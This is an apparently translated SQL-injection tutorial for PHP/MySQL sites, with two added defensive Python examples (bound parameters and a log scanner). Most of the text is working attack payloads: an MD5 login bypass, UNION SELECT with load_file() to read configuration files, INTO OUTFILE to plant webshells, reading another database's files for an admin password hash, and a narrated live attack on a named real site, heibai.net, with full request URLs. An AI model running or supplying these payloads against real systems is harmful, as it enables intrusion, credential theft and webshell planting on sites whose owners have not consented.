4. The nightmare of MD5
Dr. Wang of Shandong University has been cracking MD5. We'll make a mess of it too, and we even have one up on Dr. Wang: we don't have to calculate anything, haha.
We have a way around MD5, but not everywhere. PHP's md5() function cannot be bypassed, because everything you enter goes into it and nothing gets out. What can be bypassed is an MD5() call inside the SQL statement. Of course, other functions inside SQL can be bypassed too, for the same reason.
See the example first:
login.php
<?php
......
$query = "SELECT * FROM alphaauthor WHERE username=MD5($username) AND password='" . $pw . "'";
......
?>
We submit the following directly in the browser:
login.php?username=char(97,98)) or 1=1%23
Substituted into the SQL statement this becomes
SELECT * FROM alphaauthor WHERE username=MD5(char(97,98)) or 1=1 #) AND password='$pw'
and everything after the # is a comment.
Remember to put something inside MD5() so that its parenthesis is closed properly before the or 1=1; we just put a random char(97,98) there. OK, the login has succeeded! See, MD5 is of no use against us.
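The reason the trick works is that the login query is built by pasting `$username` into the SQL text, so the input can close the MD5( ) call and append its own condition. The following is an added example, not code from the original article: it rebuilds the login query over an in-memory SQLite table in two forms, the concatenated form from login.php and a form with bound parameters, and runs the same input against both. SQLite has no MD5(), so a Python implementation is registered under that name, and SQLite uses `--` rather than MySQL's `#` for line comments, so the article's payload is adapted accordingly; the table and column names are the article's, the stored row is constructed. The same fix applies to the INSERT in reg.php in section 6.

```python
import hashlib
import sqlite3

# Added example (not from the original article): the login query from login.php
# rebuilt over an in-memory SQLite table, once by string concatenation (the
# vulnerable form) and once with a bound parameter. SQLite has no MD5(), so a
# Python implementation is registered under that name; SQLite uses "--" rather
# than MySQL's "#" for line comments, so the article's payload is adapted.
# Table and column names come from the article; the row contents are constructed.

# The article's bypass, with "#" swapped for a SQLite line comment
PAYLOAD = "char(97,98)) or 1=1 -- "


def make_db():
    con = sqlite3.connect(":memory:")
    con.create_function("MD5", 1,
                        lambda s: hashlib.md5(str(s).encode()).hexdigest())
    con.execute("CREATE TABLE alphaauthor (username TEXT, password TEXT)")
    # Constructed sample row: the username column stores MD5('admin'),
    # mirroring the article's username=MD5(...) comparison.
    con.execute("INSERT INTO alphaauthor VALUES (?, ?)",
                (hashlib.md5(b"admin").hexdigest(), "s3cret"))
    return con


def login_concat(con, username, pw):
    """Vulnerable: user input is pasted into the SQL text, exactly like login.php.
    The payload closes MD5( ) and appends 'or 1=1', so a row comes back."""
    query = ("SELECT * FROM alphaauthor WHERE username=MD5(" + username
             + ") AND password='" + pw + "'")
    return con.execute(query).fetchone()


def login_bound(con, username, pw):
    """Hardened: the input is a bound value, so it is hashed as a plain string
    and can never close the MD5( ) call or add a condition."""
    query = "SELECT * FROM alphaauthor WHERE username=MD5(?) AND password=?"
    return con.execute(query, (username, pw)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("concatenated query, payload:", login_concat(db, PAYLOAD, "wrong"))
    print("bound query, payload:       ", login_bound(db, PAYLOAD, "wrong"))
    print("bound query, real user:     ", login_bound(db, "admin", "s3cret"))
```

With the bound form the whole payload is treated as the username value, so the MD5 comparison simply fails. In PHP the equivalent is a prepared statement through PDO or mysqli with placeholders; escaping alone is not enough here, because the article's payload contains no quotes for magic_quotes_gpc or addslashes() to escape.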
5. Core technique: using a PHP+MySQL injection hole to write a webshell directly
Getting a webshell directly from injection is what everyone wants most, so I'll teach you below.
This assumes you already know the physical path of the site; I'll assume it is c:/apache/htdocs/site. The site's MySQL connection information is in /lib/sql.inc.php.
1) Applicable when magic_quotes_gpc=off
Suppose we can upload pictures, txt, zip and so on. We give our Trojan a .jpg suffix; after uploading, its path is /upload/2004091201.jpg.
The content of 2004091201.jpg is
OK, let's start:
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(c:/apache/htdocs/site/upload/2004091201.jpg),4,5,6,7,8,9,10,11%20into%20outfile c:/apache/htdocs/site/shell.php
Because INTO OUTFILE is used, the web page does not display properly, but our task is done.
As shown in Figure 28
Let's hurry and look at http://localhost/site/shell.php?cmd=dir.
As shown in Figure 29
Cool, isn't it? We have successfully created a webshell. See the 12 at the front? That's what we output with select 1,2!
2) The following is a method of saving a webshell that works when magic_quotes_gpc=on; obviously it can also be used when magic_quotes_gpc=off.
We read its configuration file directly, using the method introduced in technique 2:
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433a2f6170616368652f6874646f63732f736974652f6c69622f73716c2e696e632e706870),4,5,6,7,8,9,10,11
We get the content of sql.inc.php as
All right, we have the MySQL root password, and we found the phpMyAdmin backend.
http://localhost/phpmyadmin/
Log in as root with the empty password.
As shown in Figure 30
Then we create a new table, with the following structure:
#
# Table structure for table 'te'
#
CREATE TABLE te (
  cmd text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
#
# Dumping data for table 'te'
#
INSERT INTO te VALUES ();
OK, now it's time for our SELECT * FROM table INTO OUTFILE.
Enter the SQL directly in phpMyAdmin:
SELECT * FROM `te` INTO OUTFILE 'c:/apache/htdocs/site/cmd1.php';
As shown in Figure 31
OK, it executed successfully. Let's go to http://localhost/site/cmd1.php?cmd=dir and see the effect.
As shown in Figure 32
That's a webshell, right? Haha, I like it too.
But have you noticed that we finished the job with magic_quotes_gpc=on? Inside phpMyAdmin we didn't have to worry about the quote restriction at all, haha. What does that tell us? phpMyAdmin is just too great; this is the magic_quotes_gpc=on bypass we were talking about!
6. Have you noticed that we can also use UPDATE and INSERT to put our data in, and then get our webshell that way? We'll use the example above again.
reg.php
<?php
......
$query = "INSERT INTO members VALUES ($id, $login, $pass, $email, 2)";
......
?>
We enter it in the email field.
Let's say our registered ID is 10.
Then we find another place to inject:
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20into%20outfile c:/apache/htdocs/site/test.php
Well, we've got our webshell again.
7. MySQL cross-database queries
Everyone has heard that MySQL can't do cross-database queries. Haha, today I'll teach you a good way to do a disguised cross-database query: use load_file() to read the files under MySQL's data folder directly, which gives us an unusual kind of cross-database query.
For instance.
Before we do that, let's talk about the structure of MySQL's data folder.
The data folder contains a subfolder named after each database, and inside it each table generates three files with the suffixes .frm, .MYD and .MYI. For example, MySQL has an alpha database with two tables, alphaauthor and alphadb, in it;
the alpha folder then contains what is shown in Figure 33.
Here alphadb.MYD holds the data of the alphadb table and alphadb.frm the table's structure; the content of alphadb.MYI varies with the MySQL version, so open it in Notepad to judge for yourself.
The experiment begins.
Suppose we know that another database, yminfo210, exists, with a table user in which the admin information is stored.
We submit
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(yminfo210/user.myd),4,5,6,7,8,9,10,11
To explain: load_file()'s default directory is MySQL's data directory, so we use
load_file(yminfo210/user.myd); of course load_file(./yminfo210/user.myd) works the same way. Note that the default path for INTO OUTFILE is the folder of the database you are currently in.
The result is as shown in Figure 34
Let's see what we read.
舼 ? Admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin Question admin answer http://www.yoursite.com (? 靃? ka 靃 ? 靃? 127.0.0.1 D|?? AAA 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com Sdfasdfsdfa asdfadfasd? e 麷 am 麷 a 127.0.0.1 222 222222223423
Although there is a heap of garbage, we can still see that the username is admin and the password is 698d51a19d8a121ce581499d7b701668; the rest is other information.
In this way we have achieved a roundabout cross-database query; the example below will mention it again!
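Seen from the defender's side, the requests used in sections 5 and 7 leave a clear signature in the web server's access log: a UNION SELECT, a load_file() call, an INTO OUTFILE, and file paths hidden in 0x... hex literals or char() lists so that no quotes are needed. The following is an added example, not part of the original article: it scans constructed access-log lines for those patterns, URL-decodes the query string, and decodes the hex and char() literals so the analyst can see which file a request tried to read or write. The log format, IP address and timestamps are constructed; the paths and encoded literals are the ones that appear in the article.

```python
import re
from urllib.parse import unquote_plus

# Added example (not from the original article): scan web-server access-log
# request lines for the injection patterns used above (UNION SELECT,
# load_file(), INTO OUTFILE) and decode the 0x.. and char(..) literals so the
# analyst can see which file the request tried to read or write.
# SAMPLE_LOG is constructed for this example; the paths and encoded literals
# inside it are the ones from the article.

SAMPLE_LOG = """\
127.0.0.1 - - [12/Sep/2004:10:00:01 +0800] "GET /site/display.php?id=451 HTTP/1.1" 200 5120
127.0.0.1 - - [12/Sep/2004:10:00:07 +0800] "GET /site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433a2f6170616368652f6874646f63732f736974652f6c69622f73716c2e696e632e706870),4,5,6,7,8,9,10,11 HTTP/1.1" 200 2048
127.0.0.1 - - [12/Sep/2004:10:01:15 +0800] "GET /site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(yminfo210/user.myd),4,5,6,7,8,9,10,11%20into%20outfile%20c:/apache/htdocs/site/shell.php HTTP/1.1" 500 0
"""

# Patterns are matched against the URL-decoded query string, so %20 tricks
# and mixed case do not hide them.
SIGNATURES = {
    "union_select": re.compile(r"union\s+(all\s+)?select", re.I),
    "load_file": re.compile(r"load_file\s*\(", re.I),
    "into_outfile": re.compile(r"into\s+(out|dump)file", re.I),
}
HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})", re.I)
CHAR_LITERAL = re.compile(r"char\s*\(([\d\s,]+)\)", re.I)
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def decode_literals(text):
    """Return the strings hidden in 0x.. and char(..) literals of a decoded query."""
    found = []
    for m in HEX_LITERAL.finditer(text):
        hexdigits = m.group(1)
        if len(hexdigits) % 2 == 0:          # an odd digit count is not a byte string
            found.append(bytes.fromhex(hexdigits).decode("latin-1"))
    for m in CHAR_LITERAL.finditer(text):
        codes = [int(c) for c in m.group(1).replace(" ", "").split(",") if c]
        if codes and all(0 <= c < 256 for c in codes):
            found.append("".join(chr(c) for c in codes))
    return found


def scan_line(line):
    """Return a finding dict for one access-log line, or None if nothing matched."""
    m = REQUEST.search(line)
    if not m:
        return None
    decoded = unquote_plus(m.group(1))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    if not hits:
        return None
    return {"path": decoded.split("?", 1)[0],
            "signatures": hits,
            "decoded_literals": decode_literals(decoded)}


def scan_log(text):
    """Scan every line of an access log and return the findings in order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The decoded literal of the second line is the sql.inc.php path from section 5, which is exactly what an analyst needs to know which secrets to rotate. Detection is the second line of defence; the first is that load_file() and INTO OUTFILE both require MySQL's FILE privilege and are confined by secure_file_priv, and the account a web application connects with should have neither FILE nor any other privilege it does not need.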
Having said so much, let's put it to concrete use. The target of this test is a well-known security site, Heibai Network.
Have you heard people say there's a hole in Heibai? Let's go and have a look.
Http://www.heibai.net/down/show.php?id=5403%20and%201=1
It displays normally.
As shown in Figure 35
http://www.heibai.net/down/show.php?id=5403%20and%201=2
The display is abnormal.
As shown in Figure 36
All right, let's go:
http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201
The result is displayed as follows
As shown in Figure 37
Note that the program's name is not displayed in the picture, and it comes with
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\show.php on line 45
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\global.php on line 578
Dizzy, the site's path has come out; now it's surely done for!
We kept going until we guessed
http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
which displays normally.
As shown in Figure 38
Now we change the statement into
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
It displays as shown in Figure 39.
Looking at the introduction field, which shows 12, we can guess that it is of character type!
OK, let's first look at the contents of the file.
D:/web/heibai/down/show.php converted to ASCII codes is
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)
We submit
view-source:http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19
view-source: means view the page source; as to why we use it, we'll talk about that later.
It shows its source code.
As shown in Figure 40
Because there is a line like this in show.php
if we submit it directly in the browser, we'll be redirected to list.php.
We found this line: require("./include/config.inc.php");
Good stuff, this should be the configuration file. OK, continue:
d:/web/heibai/down/include/config.inc.php
converted into char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
We enter